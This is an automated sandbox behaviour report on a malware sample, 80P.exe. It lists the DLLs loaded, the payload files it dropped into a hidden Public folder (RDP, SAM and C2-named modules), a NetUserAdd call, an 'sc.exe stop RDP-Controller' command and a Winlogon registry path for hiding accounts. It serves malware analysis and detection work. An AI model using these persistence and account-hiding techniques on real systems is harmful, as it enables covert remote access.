                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: apphelp.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptbase.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: ntmarta.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: winhttp.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: windows.storage.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wldp.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netapi32.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: userenv.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netutils.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samcli.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: libi2p.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptsp.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rsaenh.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: zlib1.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: dnsapi.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samlib.dll
                    Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: winhttp.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptbase.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: windows.storage.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wldp.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netapi32.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: userenv.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netutils.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samcli.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: libi2p.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptsp.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rsaenh.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: zlib1.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: dnsapi.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samlib.dll
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile written: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.ini
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: 80P.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: 80P.exeStatic file information: File size 13431296 > 1048576
                    Source: 80P.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x9a0600
                    Source: 80P.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x152400
                    Source: Binary string: RfxVmt.pdb source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.20.dr
                    Source: Binary string: RfxVmt.pdbGCTL source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, rfxvmt.dll.20.dr

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\80P.exeUnpacked PE file: 0.2.80P.exe.3440000.1.unpack
                    Source: rfxvmt.dll.20.drStatic PE information: 0xE004CD23 [Sat Feb 5 03:04:03 2089 UTC]
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FF6BFD6DEBE GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,20_2_00007FF6BFD6DEBE
                    Source: 80P.exeStatic PE information: section name: .didata
                    Source: jvnu3e85o6ls9huft0apy3731vg.exe.1.drStatic PE information: section name: .xdata
                    Source: main.exe.9.drStatic PE information: section name: .xdata
                    Source: rdpctl.dll.20.drStatic PE information: section name: .xdata
                    Source: samctl.dll.20.drStatic PE information: section name: .xdata
                    Source: prgmgr.dll.20.drStatic PE information: section name: .xdata
                    Source: dwlmgr.dll.20.drStatic PE information: section name: .xdata
                    Source: cnccli.dll.20.drStatic PE information: section name: .xdata
                    Source: libi2p.dll.20.drStatic PE information: section name: .xdata
                    Source: evtsrv.dll.20.drStatic PE information: section name: .xdata
                    Source: termsrv32.dll.20.drStatic PE information: section name: .xdata
                    Source: 6DPA479I.20.drStatic PE information: section name: .xdata
                    Source: TzijR9kt.20.drStatic PE information: section name: .xdata
                    Source: oWkqS6Ji.20.drStatic PE information: section name: .xdata
                    Source: 9m9shiPj.20.drStatic PE information: section name: .xdata
                    Source: wwgq2y6S.20.drStatic PE information: section name: .xdata
                    Source: NCdDxWNe.20.drStatic PE information: section name: .xdata
                    Source: ia0qD2w9.20.drStatic PE information: section name: .xdata
                    Source: I2Hoxnam.20.drStatic PE information: section name: .xdata
                    Source: C:\Users\user\Desktop\80P.exeCode function: 0_2_02EBF262 push es; retf 0_2_02EBF263
                    Source: C:\Users\user\Desktop\80P.exeCode function: 0_2_02EA675D push esi; ret 0_2_02EA675F
                    Source: C:\Users\user\Desktop\80P.exeCode function: 0_2_02EA3D4E push eax; iretd 0_2_02EA3D4F
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0EC0FC37 push rsp; ret 20_2_00007FFE0EC0FC38
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 31_2_00007FFE1174FC37 push rsp; ret 31_2_00007FFE1174FC38
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FFE0E16521B strlen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strlen,NetUserAdd,CreateProfile,20_2_00007FFE0E16521B
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllJump to dropped file
                    Source: C:\Users\user\Desktop\80P.exeFile created: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\ieIgHN2AJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dllJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\wwgq2y6SJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dllJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\9m9shiPjJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dllJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\TzijR9ktJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dllJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\ia0qD2w9Jump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\NCdDxWNeJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\I2HoxnamJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\oWkqS6JiJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dllJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\6DPA479IJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\ieIgHN2AJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\wwgq2y6SJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\9m9shiPjJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\TzijR9ktJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\ia0qD2w9Jump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\NCdDxWNeJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\I2HoxnamJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\oWkqS6JiJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\6DPA479IJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\ieIgHN2AJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\6DPA479IJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\TzijR9ktJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\oWkqS6JiJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\9m9shiPjJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\wwgq2y6SJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\NCdDxWNeJump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\ia0qD2w9Jump to dropped file
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\I2HoxnamJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeFile created: C:\Users\user\AppData\Local\Temp\installer.logJump to behavior
                    Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 20_2_00007FF6BFD68C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,20_2_00007FF6BFD68C4A
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
